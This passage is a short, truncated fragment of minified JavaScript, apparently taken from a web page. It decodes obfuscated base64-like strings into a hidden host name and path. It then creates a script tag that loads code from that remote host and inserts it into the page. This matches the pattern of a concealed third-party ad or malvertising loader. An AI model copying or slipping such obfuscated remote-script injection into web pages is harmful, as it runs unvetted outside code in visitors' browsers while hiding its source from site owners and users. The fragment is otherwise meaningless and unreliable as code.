RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('bGtkLnh6cHlqZC55jb20=','dHIueWVzdW422NzguY229t','137167',window,document,['5','2']);}:function(){};